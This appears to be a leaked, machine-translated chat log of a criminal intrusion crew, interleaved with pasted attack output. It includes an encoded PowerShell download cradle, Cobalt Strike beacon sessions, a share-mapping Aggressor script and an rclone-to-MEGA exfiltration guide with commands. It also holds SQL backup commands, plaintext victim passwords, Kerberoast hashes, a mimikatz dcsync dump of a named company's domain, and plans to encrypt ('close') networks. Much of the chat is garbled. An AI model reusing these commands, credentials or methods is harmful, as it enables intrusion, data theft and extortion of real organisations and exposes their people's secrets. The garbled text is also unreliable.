hpbXVtIDkwMCk9YCI6JChHZXQtUmFuZG9tIC1NaW5pbXVtIDQwMCAtTWF4aW11bSAxMDAwKWAiOyBtYT0kKEdldC1SYW5kb20gLU1pbmltdW0gLTk4NzY1NDMgLU1heGltdW0gOTg3NjU0MykiKTsKJHdjLk
``full''
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA==
Give me a load of the stuff you don't have...put the dlluwas supposed to be there yet. did it come?[ ](https://mediaeveryone.com/channel/general?msg=2K7rdb6f6WThpRqdB) ok if it doesn't come in 30 min, you'll write 30 min. put@user4 give me more silk code[ ](https://mediaeveryone.com/channel/general?msg=tXPbfeLk4E8h253QE) add me to the confutaq still 1 help @user8 he has a fat network there would not want to lose it, build a dll from kobyzhivoy there) my it?TomHolzerFordwhat's his? ask my guys if it's theirs. I'll tell you what's mine... I'm confused, yours is not)((I mean @user4)
urlbig.com:443vrue, found yours now give others do not exist think about how you'll act just run your eyes over the Mapuhoto not worthwhile@user9 write out a plan to close by roadmap7[ ](https://mediaeveryone.com/channel/general?msg=R3BrByJd5Xknit5Jx) under whom? which did not have time? if so, then the conf is not me yesterday there was another - ballymoregroup.com if you can get it back, I can continue with it, or user8 help with 26 trustsconf under it there was another one, but it almost immediately offsolved - did not have time[ ](https://mediaeveryone.com/channel/general?msg=vr32eeF23pzvdXTJo) heremb I will now launch you there in general those with whom I workedwill see what to give me)no. but for today, yes)are you done with him? no. we were here with the router again poking around and you started at 6?[ ](https://mediaeveryone.com/channel/general?msg=9pJzNgC67kaNguRSm) writing, yesterday the last one at the end of the day went to the offethese means to sit do nothing?there is no active guys, I'm not a telepath, if you sit without work write write that people are working in the input sessions who like yesterday are still dead why sit silently I also do not have a live in the input cobb is there new? or after 3 am or until 6 pm you know the timing in my grid kst only 8 am@user9 if finished take another network to work) ah) I have it and build skidtak before closing) so ah close.we are not closing now why? @tl1 add us to @user9 in the confab, if it's not difficultselfspin.com sorting of servers and other information in the confab.hiB corbel.com all ready for closure then the plan for today is: 2 people who have already taken YES work in the same networks and preparing to close, the rest while lifting the rightsDa, but not all came up All alive, in sound mind and health?HiTo all helloDa)morninG) to all goodnightTo all without misunderstandingTomorrow i.e. todayHappyTo all until tomorrow)hopefully in the eveningTo 6 khoroshoda, two?without "probably a normal grid" right? total 2 networks with Dada, also Dada and dll running `MM-LIB` host where the dll stuck rolling check and then staskun at the stage of work with vpnom it was in lrhstuck and did not solve[ ](https://mediaeveryone.com/channel/general?msg=Xj8qmsWoqKomTqCah) how did you solve?give the hostname also yes and dll is running? well i had at least so it was somysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysm's was there yes, looking for edtam xp) ohohohojitwinds you ten tomorrow will solve these cases get such ``
beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[+] host called home, sent: 95 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

``boys are part of a group of hp adminstrusts will scour tomorrow in the current one or trastaherstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA YES. all sessions off.this is wherealloypolymers.com
>description: password rbuilder
>description: Generic GroupWise account for Adhesives.  Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: The service account for DCWAS08 Execel Password is VantgagePoint
``@user8 here's some food for thought for tomorrow if the session doesn't die[ ](https://mediaeveryone.com/channel/general?msg=A24quWh36NdPwR2Px) COGNOSPD.korbel.com
dcsync was taken off, maybe the lab, now in slip, waiting for commands
 
`wilsonart.com'.
28 trusts, minus duplicates and quarantines - 7
7 trusts removed from hell, two trusts and the current domain removed from the kerbs@user9 say his hostnamecorbel.com
There is a YES
run the dll on the far server
found sphere and creeds
found edr and krediSnatched the AD, lifted the system, no kredi to move on, with nyah kerb kredi given for decryption.are there dll running on the servers and so yes to me exactly the network interests with YES which we will close tomorrowwrite reports on workMany of 2826 trusts)are you many left?+++ alive? you about the zealot do not forget? my keyloggers empty (there is nothing empty) they just work with shul and sometimes write to each other keyloggers have not checked? yes shul there all in #waterway-com uploading backups mail finance admins + deal with shul so what do you have?so the sooner we check everything for tomorrow the sooner we go to bedtoday we're closing 2 grids so the sooner we work the sooner you go hometodaytodaytodaytodaytodaytodaytoday by 6 and today we need to prepare everything for tomorrow i understand you're tiredtodaytoday we're closing the rt or till 00 work @tl2 @tl1 same, backups in water what are you busy doing?i did not try it, that's why i wrote it like with rdp)) try it without rdp? it pours very fast because of the high compression
now there is no need for any 7za and unzipping the mega! everything is very quiet and unnoticeable!

download rclon from the off-site. rclon.exe put it in the right directory, then everything according to the manual. I did everything through the rdp
You register a mega, choose it from a huge list, which rclon provides us. rclon quietly connects to the mega and makes a clone of what you need. you can at least the whole fs. it downloads everything through rclon, so the download speed is high.

Here's the guide. It's simple
https://rclone.org/mega/

next command to download

rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.

example

rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
``https://rclone.org/если requires some amount of data to be uploaded''.
8. Backup database
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"


for remote/other local server change localhost to ip,port
alternatively localhost,%port% (see netstat)
``````
7. Output all tables of a specific database
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
``````
with size in megabytes
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"

``````
1. Display all databases on the server in kmd
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
As soon as you jump into the process you look at the databases list by default there is sqlcmd tool installed on the server it has direct access to the data to backup the sqlwriter, sqlsrv processes on the sql server) workedI press the bind nothing happens what? @tl1Yt hf,jnftn&https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check thereupon there is access to the domain no load for egoghbdtnHi, our evo vpn has fallen awayHiHiHiWell, now checking did you check wilson? did the file appear on the unshared armas? flew home where we have @user9? how unexpected and niceaaa we miss your family as much as you)missed you?)helloTo all helloDo you want me to ask everyone in the confuskinu to the appropriate confuaga, I'll dig in the records of strangers to see what there may be interestingthem the difficulty, as I understand from @user7 is to find a sphere / backups? well, let's finish today probably? there he is small aha)as you see - norrivet good evening! @tl1 not yet?
BACKUP$
BACKUPDVR$
CHIBACKUP2020$
CLEBACKUP$
CLEBACKUP2020$
DVRBACKUP2020$
DVRNEWBACKUP20$
KCBACKUP2020$
KCNEWBACKUP2020$
NEWBACKUPCHI$
NEWBACKUPCLE$

``````
\BLAUERPC\D$
\DRB2\Archive
\\{\DRB2\Backup
\\Replication
\\GKELLER/G$/Backup
\\GKELLER/G$/WW2k1/IT/SolarwindsBackups
\REPORTING\D$\SQLBackup
\\Data\AKPRO_Data\BACKUPS
\WW2K1\F$/Backup
\WW2K1\F$Data\AKPRO_Data\BACKUPS
\\{\WWSQL\S$\SQLBackup
``.``WATERWAY\blauer 11915Admin2179!````
http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!
WATERWAY\mharper LoveUnit14
``Good evening. we're here)))))Thank you for such flattering words, and @tl1 is also a pleasure to work with
I wish I could find some red words, but I'll just respond with... an anecdote!

A pentester is walking through the desert, he wants sex, he meets a genie, and he asks him "What do you want, traveler?"
-Fucking, says the pentester.
And then out of nowhere appears a bunch of all sorts of spheres without creed, not decrypted hashes on kmd5, nets in which the domain is not visible and a billion all kinds of avers

-Get the fuck out of here,‖ jinny answers. -Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course.
CEH, OSCP and the like
So have a nice holidays) see you next year) Likewise) We are also happy to work with you )From us too we want to say thank you, it is a very useful experience, especially in a short period of time. My head is boiling, but it is interesting) Happy New Year to you = ) )In short - all are good) the most difficult passed) further will only be more interesting) from my experience, I say that in comparison, you are growing very quickly on the technical part, small zatupy have all, and this is normal
But next year we'll get to a completely different speed, start parallel technologies, dig nixes
i for my part and @tl1 and the development team will also be preparing some cool stuff for you
hope i am not mistaken)and for a very short time by the standards of junior pentests we have come a long way from 0 to the current cases with the flag -nomutex so i want to share my impressionsthen see you soon) backups in work, the backups are working and i'll be back up by 21 til next tuesday. i will probably be gone by tuesday, but report back here now please = )
so @tl1 knows what's the plan)
who can today - pull up to 21
if no one can, go on vacation
I don't know anything.)
At @tl1 let's ask)last day also in case of success? >last case on the last dayvono, of course, no problem, if anyone else can not - say, today "at will" with bonuses in case of success of the work itselfvtl1 we'll have a day of groundhogs at me at all
I just looked at the calendar for the first time in a week and a half or two I will be able to communicate, but not in the office, in the evening I fly away
I was planning to go on holiday today, so the tickets are bought(
i think the guys will cope with a small network without me a good question, i think to finish some last case on the last day =)and for what, like we said on holidays go away ... friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest
@tl1 said before leaving that we're going to 21, have time to rest?[ ](https://mediaeveryone.com/channel/general?msg=FtyaEbnGv588f4knR) Well, another plus exeshnik is a lot of threads. icacls a long teamdobavliv grunt fullpo therefore exeşnik seemed easier) there batnick also swore - and Timlid2 said, I threw you in private, something about regulars, etc.so polis are more swearing ehena exe and scatterbatnik easier than ehesut same in order to scatter on armieswhy not batnick?and build me, in laba runningasdavayne, if grunt full works fine then add it to the exeştnik - minute and so and so ran from the admin? i checked in the laba batnick - no problem with this no - vorkgruktachka outside the domain?
Node Name: DESKTOP-5SMSDNR OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18363 N/A OS Manufacturer: Microsoft Corporation OS Settings: Isolated Workstation OS Build: Multiprocessor Free Registered Owner: User Registered Organization: Product Code: 00330-80000-00000-AA618 Installation Date: 09/16/2020, 13:38:44 System Boot Time: 12/22/2020, 1:54:35 System Manufacturer: Gigabyte Technology Co.                                                         System model: G31M-ES2L System type: x64-based PC Processor(s): Number of processors - 1.                                                                                                  [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz BIOS version:                      Award Software International, Inc. FF, 10/13/2009 Windows folder: C:\Windows System folder: C:\Windows\system32 Boot device:              \Device\HarddiskVolume1 System language: ru;Russian Input language: ru;Russian Time zone: (UTC+03:00) Moscow, St. Petersburg Full physical memory: 4,085 MB Available physical memory: 715 MB Virtual memory: Max size: 5,621 MB Virtual memory: Available: 828 MB Virtual memory: Used: 4,793 MB Swap file location: C:\pagefile.sys Domain: WORKGROUP Network login server:              \DESKTOP-5SMSDNR Patch(s): Number of installed patches - 12.                                                                                   [01]: KB4586878 [02]: KB4513661 [03]: KB4516115 [04]: KB4517245 [05]: KB4521863 [06]: KB4561600 [07]: KB4576751 [08]: KB4576754 [09]: KB4577670 [10]: KB4580325 [11]: KB4586863 [12]: KB4592449 Network adapters: Number of network adapters - 2.                                                                                            [01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30) Connection Name: Ethernet DHCP enabled: Yes DHCP server: 192.168.88.1 IP address [01]: 192.168.88.248 [02]: fe80::d935:55:e14f:fe49 [02]: VirtualBox Host-Only Ethernet Adapter Connection Name: VirtualBox Host-Only Network DHCP enabled: None IP address [01]: 192.168.56.1 [02]: fe80::f4c1:748b:225c:98a0 Hyper-V Requirements:               Virtual machine monitoring mode extensions: Yes Virtualization enabled in firmware: Yes Layer 2 address conversion: No Data execution prevention available: Yes
``vin10version os etc.'' Where do you run it?
System error 1332.                                                                                                                                                                                                                          Matching between user names and security identifiers has not been performed.  
``there - where?'' without grunt full, it's just going the wrong way.
C:\Users\awilson\Desktop>1.bat

C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full
c was shared successfully.


C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full
d was shared successfully.


C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.


C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.


C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.
NET share A=A: / grant:everyone,full`` you have a space there so lol)`` the same principle read a file that doesn`t exist so what do you want?
C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full Unknown parameter /.                                                                                                                                                                                                                         Syntax for this command: NET SHARE shared_resource shared_resource=disk:path [/GRANT:user,[READ | CHANGE | FULL]] [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents| Programs | BranchCache | None] shared_resource [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents | Programs | BranchCache | None] {shared_resource | device_name | drive:path} /DELETE shared_resource \\computer_name /DELETE For more help, type NET HELPMSG 3506.                                                                                                                                                                                                                                                                                                            C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full System error 1332.                                                                                                                                                                                                                          The mapping between user names and security identifiers has not been done.  
I ran the lead on our office computer. win10what was the environment? So it was in the batch file and it was telling me "I can't match something to something" I don't know what it was telling me?
/grant:everyone,full
```
it's not working at all ```
/grant Everyone:F /T /C /Q
/grant:everyone,full
```
did you take this into account? didn't you make this one?[ ](https://mediaeveryone.com/channel/general?msg=tTo8qqSowdwhX3xRy) not this one?[ ](https://mediaeveryone.com/channel/general?msg=BgFFK5gy8Bs3kp6Kx) what was the batik and the exechanger? I won't answer, you'll get scolded, did you make the batik and then exechanger by any chance save it?good question, I do not know which of the confines of the wrote it guys who remember where @tl2 wrote about the driver balls, please copy them to health host specified in , the second argument) mapped only c$ balls thank you) `` ``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020
[*] Attaching c$ in KCNEWBACKUP2020 host
[*] Tasked beacon to run: net use *\\\KCNEWBACKUP2020\c$ /PERSISTENT:YES
[*] Tasked beacon to run: net use
[+] host called home, sent: 115 bytes
[+] received output:
Drive Z: is now connected to \\KCNEWBACKUP2020\c$.

The command completed successfully.


[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.

``Check''.
#ShareMapper.cna
#Author: @noname
#no desc

beacon_command_register("share-mapper", "shares attacher",
    "Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]");

alias share-mapper {
    if ($2 is $null) {
        berror($1, "Need hosts!)
    } else {
        @hsts = split(",", ["$2" trim]);
        foreach $entry (@hsts) {
            blog2($1, "Attaching c\$ in $entry host");
            bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES");
        }
        bshell($1, "net use");
    }
}
``For fuck's sake,``
already threw it here, not alive? if not - to reopen then @tl1 ok?
$krb5tgs$23$*sqlman$epctech.com$MSSQLSvc/sqlsrv02.epctech.com ydkwicd
``Truthfully not yet tested myself)looks interesting, but what is the "poc.exe", is it an exploit or just a tool so that the file will not be deleted? not really understand ithttp://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/ but not in 2 we guessed) no new sessions today)mm-hmmm, then continue to work dahdal @tl2 ? and where do we have @user1 and @user3? it's ok)) and @tl2 just re-snap the accessible kerb) how to check it? there are kerbs disconnected accounts yes you get the idea if the kerb LA on the server somewhere there may well be hash admin and so you can try to kerb that will unbroken check on the car from which was kerbdakerby just there?so what's the difference between admin/non-admin in this case, I'll look at the ticketsThey've deleted a lot of admins, and now the kerbs are only on the absent.no kerbs (kerbs only faster @tl2 now I'll change it so it will be better you at least change your ava) it's ok, keep quiet for a minute and he'll see for himself) look who wrote it, never mind the point it does not matter he read and did not understand it and what? well, read it carefully and what did you throw it at me first?[ ](https://mediaeveryonecom/channel/general?msg=4EFEQi79LBrjifoBX) Yeah[ ](https://mediaeveryone.com/channel/general?msg=BhrQCGmk6EgJ9rrLj) 1kerbs will be the same no matter what car they were shot on? Not me)re-shoot and direct to @tl2Need to re-shootYes, the old ones went stale...there is an alternative solution for snpartners, there are yes - but the farm is not there yet (and we have no kerbs at all so the farm will be in 2 weeks anyway kerbs yes no kerbs are you kerbs filmed?we're trying to get the credits YES[ ](https://mediaeveryone.com/channel/general?msg=BDC8RKTmvoJ8CaP9h) :dog:[ ](https://mediaeveryone.com/channel/general?msg=v8ebbs3n7d6WSkYjs) ?as it turns out nothing) (also a joke, don't take it seriously) you know? and today you said "by ten" and then "by two" you said "by ten", and? it's clear, you just said the same) i didn't understand what i wrote
?[ ](https://mediaeveryone.com/channel/general?msg=w5zjzpnoK9RJLRAy5) by two ?
?I have deja vu[ ](https://mediaeveryone.com/channel/general?msg=nkgf4mWcASkFHjag6) it's on the oldbut there will be new ones closer to 10That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now? on #stanthonyskc-com too on #snpartners-com nothing newHow are the tasks going?:space_invader:helloHow is the progress on the others? the chinese are not back, no new ones... What time do we wrap it up at 6:00? What time tonight?
Sessions is stuck.
Thanks a lot and I've got it... if you use parameter --public-only then it will show only those where user admin[ ](https://mediaeveryone.com/channel/general?msg=2iRoChhq3cHrToCzj) by default 50 like the threads are turned up to max... but that's cool. why is it so monsterrickly fast? no it's not, it'll show the balls and take the list from the adtoot just sharers I think ad is only used with ips?
execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt
```
correct ?ops)``execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt `` ping the fostlist )``
        * SharpSharesNG <ips|shares> --max-threads 10 --output console|/path/to/file
         *
         * ips - equiv ips ad
         * ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
         * ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
         * ips HostName [--os-detect] [--alive] [--exec] script\path
         * ips [ad] [--os-detect] [--alive] [--exec] script\path
         * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
         *
         *
         * shares - equiv shares ad
         * shares 10.0.0.1 [--os-detect] [--public-only]
         * shares 10.0.0.1/24 [--os-detect] [--public-only]
         * shares HostName [--os-detect] [--public-only]
         * shares [ad] [--os-detect] [--public-only]
         * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
``She's, secludes? or just start it and it spits somewhere? is there any argument? @all share please ѕharshareset one and a half pk@user8 with @user3 are preparing which of ?today we close one networkhowever not, there already all in water how is it? if not collects detailed report in confusobirthing nothin, tried three times - not collects work tules panel what, not working?hmchet all the same lostprobuyuje@tl1 reboot my dedikt plz)))) boshyuyaa all so we kolupali so a month in zohocorpinadaworkgroup? and vg is what? meanwhile study the methods of work through vpn in vg20 min then recurse you now without a task?what did you read in the mail? was it my versionoffline backups? understand how you recovered and what you missed?
beacon> shell nltest /dclist:waterway.com
[*] Tasked beacon to run: nltest /dclist:waterway.com
[+] host called home, sent: 58 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
``You threw the output with fqdn and that's what I threw the output from try to get the DC list from the list /dclist:shell nltets /dclist:yeah, fuck it```
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully

``just went to the cheknudomnoy authorization is there? hello2sessions in the water left? all bruhtoff zapatosessione not come to life, bullet? okzaytit went so, and what do you mean by ``works``?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=8s4fa9XpaArr2fSGh) this works?yeah i mean we're gonna close today for sure, no matter what we found, no we didn't find it, we're gonna bust it so yeah, we tried it, if we don't find any nass codes, fuck it, so you're probably gonna bust it without me, 3 kobos per lock
https://evatip.com
192.254.77.250:50200
zezrvNUA5VicElRQH0F2NvFJmQffkD391v
``````
https://somerd.com
172.93.102.117:40834
Q4H0EEjbHL7KlOZabfBcWTQWMcEM73agjH
``````
https://prorean.com
192.254.76.214:10340
5zYDiYJQI0dLjj4AXTUguzvJhauFWffMgIA
``I'm going to throw the builds in there coba blocked again...
in the main domain `OSDJIGHF&8SYIG*H<Orisjlfosepd````
10.7.6.124 [ ] [Apache] [ StorSimple :: Login]
10.7.6.123 [ ] [Apache] [ StorSimple :: Login]
10.7.6.125 [corpkioss01 ] [Apache] [ StorSimple :: Login]
http://10.7.6.122/
corpkioss01
/Login.aspx?ReturnUrl=%2fDefault.aspx
``````
beacon> shell dir \\10.7.6.127\C$
[*] Tasked beacon to run: dir \\10.7.6.127\C$
[+] host called home, sent: 50 bytes
[+] received output:
 Volume in drive \10.7.6.127\C$ has no label.
 Volume Serial Number is D68F-16CB

 Directory of \10.7.6.127$

05/09/2016 11:32 a. m.             1,024 .rnd
05/09/2016 11:57 a. m.                 0 2016-09-05_ImportTool.log
30/04/2015 10:27 a. m.    <DIR> inetpub
22/08/2013 09:52 a. m.    <DIR> PerfLogs
10/02/2021 12:57 p. m.    <DIR> Program Files
23/11/2020 09:51 p. m.    <DIR> Program Files (x86)
09/02/2021 10:31 a. m.    <DIR> quarantine
16/10/2018 10:09 a. m.                17 SA.txt
29/04/2015 04:41 p. m.    <DIR> sysprep
08/05/2018 11:46 a. m.    <DIR> temp
10/02/2021 12:46 p. m.    <DIR> Users
10/02/2021 01:01 p. m.    <DIR> Windows
24/12/2020 04:35 a. m.                17 WINDOWS-OS-NoPetyaVac-Perfc.log
               4 File(s) 1,058 bytes
               9 Dir(s) 15,374,311,424 bytes free

beacon> shell type \\10.7.6.127\C$\SA.txt
[*] Tasked beacon to run: type \\\10.7.6.127\C$\SA.txt
[+] host called home, sent: 58 bytes
[+] received output:
T3l3v1$a$f32018

````CORPKIOBEY01.corp.televisa.com.mx
User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Locked
Account expires Never

Password last set 2/12/2021 1:08:33 AM
Password expires 6/12/2021 1:08:33 AM
Password changeable 2/13/2021 1:08:33 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/11/2021 2:05:13 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
The command completed successfully.

``Well, then let's close today. You've speeded up two more trusts?
Teemo[TVSAKIODC01]SYSTEM */14100|2021Feb12 22:01:17> dcsync televisa.com.mx
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:televisa.com.mx /all /csv command
[+] host called home, sent: 296050 bytes
[+] received output:
[DC] 'televisa.com.mx' will be the domain
[DC] 'TVSAKIODC01.televisa.com.mx' will be the DC server
[DC] Exporting domain 'televisa.com.mx'
1179 SUPPORT_388945a0 05efac43a75cbf1f9e0b5983388f0505 66050
1160 sqladmin 498090ea0039bb36c573ef1fdf44e057 512
1143 KMSERVER 498090ea0039bb36c573ef1fdf44e057 514
6112 CWAServiceR1 ba7a1a7b42cd6fca35e67934194fca3c 514
6114 CWAService 6d5358f32a4d90f95980d7ceac959ee3 514
10673 api_pcm 4752cedd65b600826b8127c0430b3229 512
3109 bcaaa 06dc2514c2db0538319d28696eb75048 512
1618 Bluecoat 598ebb718da96396882a92f0b06c1325 512
1163 faxsrb fb372aa6ad7b9fe5ef8d5c1d054b3ff5 512
3634 Secuser 2e98bed61ce00ceafdc3eb2baff38bc4c7 512
1144 SMEX_CORPSFEIMC2_MB 498090ea0039bb36c573ef1fdf44e057 512
10706 galconector 741ef92c4096e25cd9ca2bb035b936e9 512
11635 HER07353$ b4edb36586d9e88e77ce423036da700b 4096
11618 PFUP_CORPSFEE2K13C03 37aedba06eacc09febfbda0ac7300d32 66050
11637 CHA17748$ de734d182af1f6557645f67281f3e226 4096
10716 IntegraAD af13784e9fd24d835ed1b0c6beb732b0 512
1164 faxfsr fb372aa6ad7b9fe5ef8d5c1d054b3ff5 512
1156 fax 7921378373b150580c425e509cee0b67 512
10717 usertest e1ec7440a342194fb1c7dbd740e85150 512
13604 SFE14374$ 430ea89973288e676792d7db27b3c0f6 4096
12607 EXT222322$ b465b97732ffdf356b489e156ba71154 4096
10668 MSOL_cc65aefb7e47 5bd412e07e373e5208fcb0e9adcb7d5e 66048
7105 ASPNET 8e5565c861e68d5e494393e930d837c1 66048
502 krbtgt a8f855755087b7a7e77fff41520ce276 514
13607 CORPWKIOPWASP01$ d279ede88f4792c5e04283b60380fdef 4096
10719 EQUIPOSOI$ 1e8ddf8fe99606d7ad7c31859d904e5b 2080
1155 postmaster $350b0e4e9ef8e0b3898811c188bccd06 512
1614 FILIAL$ beb568b4ea6d599c3b79090778351b7d 2080
10678 adconnect-ser c637ccf59de4e482cb12cf0710852cda 512
11631 papercut 52f9bbcc4287129d2f4a8836504f909a 512
11608 SCMusr 24b9e746467c4a641a0d1700a3aeafad 512
11604 adselfservice 716f59258fcd6a7d993a47760ebd4588 1049088
1606 CORP$ 353a5296685c659cdb9c9559311491d9 2080
10709 BackupTVSA c6daf4f4415d449fc8f9669ba4274373 1049088
11640 TVSAKIODC01$ 40b09d82bc4e7e0fe4e5307d7cdb13de 532480
10721 SNG22422$ b7e92b54d847568f32a0dbd7f2eecadd 4096
14104 TVSAAZDC01$ 262d1133e881a5acadbe4e221619272d 532480
14604 TVSAAZDC02$ 45c89710df76b1b1d21daa3bf5e62add 532480
10701 userIAM 71bd5bde3fb863be74d93e069056c4ae 512
10688 acvreco 1aa20741229122764b5fa11c1bec4a96 1114624
10724 TVSASFEAPLP01$ 12ba718959d585cf376371a3a41850ae 4096
10689 opera_wintel_tvsa 0892cadd3c8a29eb2ce63750a3fcb666 512
500 iwam_gsctvsa 9a2a704c01c6cd5431ca50c3e9f99765 512
10712 ES050616 bd94f3117d2ff5b2c593e8b0c50a75c8 1049088
1112 TSM$ 4eece5dc248f0ccfd4527e45895e9438 2080
10674 EndPoint 1b88d8b5594f3c678e385e1542343a67 1049088
12606 TVSASFEDC01$ 4d4b699e863d4806627661b9b91e1fc2 532480
501 tvsanone 498090ea0039bb36c573ef1fdf44e057 514
``on the timing for AV[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=vMHwK69pr32FGW7mB) ?according to software tests to @user3there is a macaffi
it's not a fact that it's him, look for AV and drop vindeftoot another thing
they have a lot of traffic as soon as, on some domain
Traffic there is blocked, apparently some software
If we have an update on the igekt - dll can be launched by hand
Maybe we should first launch the dll from one session on the servers, then the armas
Then through the shell dir\tasklist will check if everything is ok, premium on the phno he is in testing + like brought updated shellcode inge you will get an account from that you have long asked still update with you parsed algorithm + look admin nasa, backups and stuff3 get into trusts2 people re-serialize this domainponyatot domain is a hashdump on dkkredov imports from cobi in clearing1 like a domain
CORP\jajimenezar Oxpp912341ek9$$!
``looks like a localhost domainCORPKIODC03 better to look at hypothetically adjacent serversha also think you understand that the triage can show tickets from adjacent domains today think we'll close then work on the forum?with rubeusno you got us confused here mimikom all right we did it rubeus in general that crap you recorded on the tickets? all under the record you at least record...not with each other we fucked with each other what can you do and you fucked so much another thing))) https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a``
[*] SamAccountName : SCMusr
[*] DistinguishedName : CN=Servicio SCM Users,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx
[*] ServicePrincipalName : MSSQLSvc/CORPSFEBDP115.corp.televisa.com.mx
[*] PwdLastSet : 2/9/2021 12:12:24 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SCMusr$corp.televisa.com.mx$MSSQLSvc/CORPSFEBDP115.corp.televisa.co
                             m.mx*$42C55FA12C0A624AD1B4C709BE2ABD6F$CAD87F24C8123F7223B2966055EB4F62526A2B30F
